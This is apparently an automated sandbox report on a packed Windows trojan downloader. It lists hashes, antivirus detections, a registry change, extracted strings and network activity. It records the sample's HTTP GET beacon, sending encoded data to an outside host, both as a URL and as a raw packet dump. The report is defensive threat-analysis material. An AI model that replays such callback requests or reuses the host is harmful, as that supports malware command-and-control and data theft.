Analysis Date2014-02-01 10:49:09
MD55e580e2873d14e6c68fd20853b50d125
SHA12a2bd5a292ab0dcdc4c4c20b3482451b29176fe7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionUPX0 md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
SectionUPX1 md5: a01048fe6cd4cd0ab4b88eee772dcc86 sha1: 3720f9604c09eec81949c27fb9383698a8377aac size: 27136
SectionUPX2 md5: 8af5f72451e07221d9ca1b5b93f28b64 sha1: ac6a5464f185186650343ac8dba785e1dc961fc2 size: 512
Timestamp2009-01-24 19:16:55
PackerUPX -> www.upx.sourceforge.net
PEhash875cb952ee590ba3fbae18bcb78002fc6be72dde
AVaviraTR/Downloader.Gen
AVmsseTrojanDownloader:Win32/Renos.gen!BB
AVclamavTrojan.Downloader-75896
AVmcafeeDownloader-BNK
AVavgDownloader.Generic8.SNA

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\RFC1156Agent\CurrentVersion\Parameters\TrapPollTimeMilliSecs ➝
15000

Network Details:

DNSdownload-everything.com
Type: A
208.73.211.66
HTTP GEThttp://download-everything.com/lr/11.php?data=z/cJFvo/QuSxI04Jc6NKAUrmWCrCWqHsj1FYMbdDBtn2kyYDIVdbMUIDNGgGNLZrPutWAI7dsQ==
User-Agent: wget 3.0
Flows TCP192.168.1.1:1031 ➝ 208.73.211.66:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c722f 31312e70 68703f64   GET /lr/11.php?d
0x00000010 (00016)   6174613d 7a2f634a 46766f2f 51755378   ata=z/cJFvo/QuSx
0x00000020 (00032)   4930344a 63364e4b 4155726d 57437243   I04Jc6NKAUrmWCrC
0x00000030 (00048)   57714873 6a314659 4d626444 42746e32   WqHsj1FYMbdDBtn2
0x00000040 (00064)   6b795944 49566462 4d554944 4e476747   kyYDIVdbMUIDNGgG
0x00000050 (00080)   4e4c5a72 50757457 41493764 73513d3d   NLZrPutWAI7dsQ==
0x00000060 (00096)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000070 (00112)   4167656e 743a2077 67657420 332e300d   Agent: wget 3.0.
0x00000080 (00128)   0a486f73 743a2064 6f776e6c 6f61642d   .Host: download-
0x00000090 (00144)   65766572 79746869 6e672e63 6f6d0d0a   everything.com..
0x000000a0 (00160)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000b0 (00176)   6f2d6361 6368650d 0a0d0a              o-cache....


Strings
b...
BL.
.
.
b...
BL.
-./()*+
$%&' !"#,
}1HQMF
1n$|$ 
?`1$QK
1:'-@T
3H4=*-
>4_/^^
4MxlP@0$
4*&R(-@
-5~9)|v.
5f7Ux`
6.|^5R
6v#Fh	
>?8959
<9~d<A
9YTU`V
A19nBfos
 A9<_"
aDPbO\X@
[ag$}4
.?AV_com_error@@
b6to[@
B?ssign_T
B&XVo	9
c2_@+A$
c~'$(4
calFre
CA"`ZMf
CB:1p%a	>
cs;8=-
=daL-QQS
dHIqhJ7
diV>?oj
DK%p"Ru
 Dv%N2L%'
E@er%c
EFG@ABCLM
ExitProcess
f7R89)@
FB6~|XQ
FF&lpt
/F!S^_
\FX.@s	n
g`abclmnohijktuvwpqrs|}~45670123
G/ci{D^O
GetProcAddress
G:fp[I
|[g\]Z
`HgUoHG
h(uH9]
HvTNG!
h|wExcep
>hXV8!
=I9h6?
II@ZY?H
InternetOpenA
j1TA5@gZ
)J2]Ta
/J>rInpos2I/
kBmFSn
\kedDec8m
KeR7z\H
KERNEL32.DLL
)KHK^_
K`X}P~*
labl^HHL"
LibrCy
LoadLibraryA
Me<d`ICh
Mj.m^X
Mod*eHand
MSVCP60.dll
MSVCRT.dll
M"tVdA
N55*AU
Ndae0f
=N"LuY
&N,m_O
NNN456
NNstEJuNNN
NOHIJKT(QRS\]^ef
?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB
)<+ofF
O **!j
OLEAUT32.dll
&olfp0lwrX
(PBDU_C@
pgwcsl
@_P!ik
p_/]Io.@
P`Ow1*
pPJYk_A
PvwxyNN
<	q5di]
QAEA)12
Qj03:Y
(QVQhf
rDrX,h
*RUF,9 
\S7F"R6
swR^M:
swUQXR
t""3D't
td;V{;
!This program cannot be run in DOS mode.
tiByteToWideCharlstrlenA	
!t:KL1]
t^p_m`
<+tP</tL<
t_Y\]c6
type_info@
.)&UW[
uWVMQS
VirtualAlloc
VirtualFree
VirtualProtect
VKVj{"
V]TP;V
vWC"tIz
WININET.dll
XE\`I&
XM%sTO	
XMV	 rRc=
XPM"/,+
XPTPSW
:Y&8Ib
YA7vDfE^0R0
YK6LP0Q
Yl$[:`B@6
;YQRElSe
?'Ywkd
Z~\<az~T
*ZoqV6